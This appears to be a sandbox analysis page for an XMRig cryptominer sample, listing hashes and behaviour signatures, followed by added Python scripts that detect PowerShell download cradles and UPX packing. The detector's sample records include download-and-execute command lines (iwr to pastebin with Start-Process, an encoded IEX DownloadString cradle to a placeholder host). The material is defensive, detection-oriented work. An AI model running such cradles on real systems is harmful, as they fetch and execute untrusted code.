General

  • Target

    00d71f3ced4f93528c3a612f7608b8f0_NeikiAnalytics.exe

  • Size

    2.9MB

  • Sample

    240523-x716ladd7z

  • MD5

    00d71f3ced4f93528c3a612f7608b8f0

  • SHA1

    c1fb78b3e896ccae91f2b6c7c6c85a4bcc859edd

  • SHA256

    176bf550d1c59028d451cf385c654385c89825a07bc0976f037c00251fc98629

  • SHA512

    bd92acd84a5533a87b3879fe8b0d04fb368fc0b01ce0fcd400d10fbe85dd1ebb11c1662c7a09d7572b98ac910d01e2c904305446ab1cb664cd9ece4834046bdb

  • SSDEEP

    49152:71G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IaSEzQR4iRr:71ONtyBeSFkXV1etEKLlWUTOfeiRA2Rh

Malware Config

Targets

    • Target

      00d71f3ced4f93528c3a612f7608b8f0_NeikiAnalytics.exe

    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with the UPX open-source packer or a modified UPX build.

    • Legitimate hosting services abused for malware hosting/C2
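
The "Command and Scripting Interpreter: PowerShell", "Blocklisted process makes network request" and "Legitimate hosting services abused" signatures above all describe the same shape: a PowerShell download cradle pulling a stage from a public host. The script below is an added example of that detection logic written for this page; it is not sandbox code, and the Sysmon-style process records it scans are constructed (placeholder URLs, made-up PIDs). The hosting watch list is an assumption for the example.

```python
"""Flag PowerShell download cradles in process-creation telemetry (added example)."""
import base64
import re
import urllib.parse

# Download primitives and execution sinks that appear in one-line cradles.
# PowerShell is case-insensitive, so every pattern is too.
DOWNLOAD_PATTERNS = {
    "Invoke-WebRequest": re.compile(r"\b(Invoke-WebRequest|iwr|wget|curl)\b", re.I),
    "Invoke-RestMethod": re.compile(r"\b(Invoke-RestMethod|irm)\b", re.I),
    "WebClient": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
    "Start-BitsTransfer": re.compile(r"\bStart-BitsTransfer\b", re.I),
}
EXEC_PATTERNS = {
    "Invoke-Expression": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
    "Start-Process": re.compile(r"\bStart-Process\b", re.I),
}
# Illustrative watch list of legitimate hosting services seen staging payloads.
# Assumption for this example; replace it with your own list.
HOSTING_WATCHLIST = {"pastebin.com", "raw.githubusercontent.com",
                     "cdn.discordapp.com", "transfer.sh"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
# -EncodedCommand and its abbreviations, followed by a base64 blob.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Classify one PowerShell command line; an encoded payload is scanned decoded."""
    decoded = decode_encoded_command(cmdline)
    # Drop the base64 blob so it cannot produce accidental keyword matches,
    # then append its decoded form so the real script is what gets scanned.
    text = ENCODED_RE.sub("", cmdline)
    if decoded:
        text += "\n" + decoded
    downloads = [name for name, pat in DOWNLOAD_PATTERNS.items() if pat.search(text)]
    execs = [name for name, pat in EXEC_PATTERNS.items() if pat.search(text)]
    urls = URL_RE.findall(text)
    hosts = [urllib.parse.urlparse(u).hostname for u in urls]
    return {
        "encoded": decoded is not None,
        "downloads": downloads,
        "execution": execs,
        "urls": urls,
        "hosting_abuse": [h for h in hosts if h in HOSTING_WATCHLIST],
        # A download primitive plus either a URL or an execution sink is the cradle shape.
        "suspicious": bool(downloads) and (bool(urls) or bool(execs)),
    }


def scan(events) -> list:
    """Run analyze() over process-creation records; only PowerShell images are examined."""
    hits = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        if image not in POWERSHELL_IMAGES:
            continue
        result = analyze(ev["CommandLine"])
        if result["suspicious"]:
            hits.append({"pid": ev["ProcessId"], **result})
    return hits


# Constructed sample records (not real telemetry); the URLs are placeholders.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -nop -w hidden -c "iwr https://pastebin.com/raw/EXAMPLE '
                    r'-OutFile $env:TEMP\u.exe; Start-Process $env:TEMP\u.exe"'},
    {"ProcessId": 4188,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.ps1')")},
    {"ProcessId": 4210,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"ProcessId": 4300, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://example.invalid/"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Command-line matching is the cheap first pass; a cradle built from string concatenation or variable substitution will slip past it, so in production pair this with PowerShell Script Block Logging (Event ID 4104), where the de-obfuscated script is what gets logged.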

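The "UPX packed file" signature is worth reproducing locally before dropping the sample into a debugger, because stock UPX leaves two easy tells in the PE: section names UPX0/UPX1 and a "UPX!" magic in the packed header block, and a modified UPX build usually removes only the first. The script below is an added example of that check written for this page; it is not the sandbox's detection code, and the PE images it inspects are minimal headers constructed by build_sample_pe(), not the analysed binary.

```python
"""Static UPX indicators in a PE file: stock section names and the UPX! marker (added example)."""
import struct

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", "UPX3"}  # written by stock UPX
UPX_MARKER = b"UPX!"  # magic in the packed-header block; may survive section renaming


def pe_section_names(data: bytes) -> list:
    """Walk the PE headers and return the names in the section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # IMAGE_FILE_HEADER follows the 4-byte signature and is 20 bytes:
    #   +2 NumberOfSections (WORD), +16 SizeOfOptionalHeader (WORD)
    file_hdr = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, file_hdr + 2)[0]
    size_opt_hdr = struct.unpack_from("<H", data, file_hdr + 16)[0]
    table = file_hdr + 20 + size_opt_hdr
    names = []
    for i in range(num_sections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes; Name is its first 8
        raw = data[off:off + 8]
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.rstrip(b"\0").decode("ascii", errors="replace"))
    return names


def upx_indicators(data: bytes) -> dict:
    """Report UPX section names, presence of the UPX! marker, and a verdict."""
    names = pe_section_names(data)
    upx_sections = [n for n in names if n in UPX_SECTION_NAMES]
    marker = UPX_MARKER in data
    if upx_sections:
        verdict = "upx"
    elif marker:
        verdict = "upx-modified"  # sections renamed, marker left behind
    else:
        verdict = "none"  # a fully scrubbed build needs entropy/import heuristics instead
    return {"sections": names, "upx_sections": upx_sections,
            "upx_marker": marker, "verdict": verdict}


def build_sample_pe(section_names, with_marker: bool) -> bytes:
    """Construct a minimal PE32 header for testing; not runnable and not the analysed sample."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    opt_size = 0xE0  # PE32 optional header size
    file_hdr = struct.pack("<HHIIIHH", 0x014C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic, rest zeroed
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    body = b"\0" * 16 + (UPX_MARKER if with_marker else b"") + b"\0" * 16
    return dos + b"PE\0\0" + file_hdr + opt_hdr + sections + body


if __name__ == "__main__":
    for label, names, marker in [("stock UPX", [b"UPX0", b"UPX1", b".rsrc"], True),
                                 ("renamed sections", [b".text", b".data"], True),
                                 ("clean", [b".text", b".rdata", b".data"], False)]:
        print(label, upx_indicators(build_sample_pe(names, marker)))
```

Treat a "none" verdict as "not stock UPX", not as "not packed": a build that scrubs both the section names and the marker still shows the usual packer profile (a near-empty import table and a high-entropy first section), which is the next heuristic to add.
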
MITRE ATT&CK Enterprise v15

Tasks